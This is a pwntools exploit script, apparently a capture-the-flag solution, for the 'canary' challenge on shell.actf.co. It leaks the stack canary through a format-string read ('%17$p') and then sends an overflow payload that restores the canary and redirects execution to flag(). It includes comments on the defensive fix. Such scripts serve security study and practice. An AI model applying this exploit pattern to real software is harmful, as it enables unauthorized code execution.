Rating: 3.0

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# Target binary; setting context.binary also fixes arch/bits/endian for pack(),
# fit(), etc. to match the ELF.
exe = ELF('canary')
context.binary = exe
context.terminal = ['tmux', 'new-window']

# Remote endpoint, overridable from the command line (HOST=... PORT=...).
host = args.HOST if args.HOST else 'shell.actf.co'
port = int(args.PORT if args.PORT else 20701)

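def local(argv=None, *a, **kw):
    """Start the target locally; under gdb when GDB is given on the command line.

    argv: extra program arguments appended after the binary path (default: none).
    Remaining positional/keyword arguments are forwarded to gdb.debug()/process().
    Returns the pwntools tube for the new process.
    """
    # Build a fresh list every call: no shared mutable default, and a caller's
    # own sequence is never modified.
    cmd = [exe.path, *(argv or ())]
    if args.GDB:
        return gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
    return process(cmd, *a, **kw)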

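def remote(argv=None, *a, **kw):
    """Connect to host:port; attach gdb to the tube when GDB is set.

    argv, *a and **kw are accepted only for signature parity with local() and
    are not used — the remote side runs its own copy of the binary.
    Note: this shadows pwnlib's remote(); connect() is the alias used instead.
    Returns the connected tube.
    """
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io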

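def start(argv=None, *a, **kw):
    """Dispatch to local() when LOCAL is set on the command line, else remote().

    argv: optional extra program arguments; always handed down as a concrete
    list so neither callee sees a shared mutable default.
    """
    target = local if args.LOCAL else remote
    return target(list(argv) if argv else [], *a, **kw)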

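# gdb commands used when GDB is set: stop once at the chosen address, then run.
# Kept as a plain literal: the previous `.format(**locals())` was a no-op here
# (no placeholders) and would raise on any later gdb command containing braces,
# e.g. `p {long}$rsp`.
gdbscript = '''
tbreak *0x00400936
continue
'''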

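# ---- exploit flow ---------------------------------------------------------
# 1. The "name?" prompt evidently echoes input through a user-controlled format
#    string, so a positional read (`%17$p`) prints the 17th stack word, which
#    the author uses as the stack canary.
# 2. The second prompt is answered with a 100-byte fitted payload: the leaked
#    value is written back into the canary slot so the stack-protector check
#    still passes, and the slot after it is pointed at flag().
# Defensive reading: a canary only protects the return address while its value
# stays secret; a fixed format string (`printf("%s", name)`, flagged by
# -Wformat-security) would have closed the leak that makes step 2 possible.
io = start()
io.recvuntil(b"name?")
io.sendline(b"%17$p")
io.recvuntil(b"you, 0x")

# %p prints no leading zero digits, so the hex text may be shorter than 16
# characters. Parsing it as an integer is length-agnostic; the previous code
# only padded the 15-character case. fit() packs the int per context (64-bit).
canary_hex = io.recvuntil(b"!\n", drop=True)
canary = int(canary_hex, 16)

# Offsets come from cyclic-pattern lookups made on an earlier run (the canary
# slot via an 8-byte pattern, the return slot via the default 4-byte one).
# payload = cyclic(100, n=8) - on first run to find 'haaaaaaa' in RAX
payload = fit({
    cyclic_find(b'haaaaaaa', n=8): canary,
    cyclic_find(0x61616173): exe.sym.flag,
}, length=100)

io.recvuntil(b"me?", drop=True)
io.sendline(payload)
log.info(io.recvline())

# io.interactive()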
```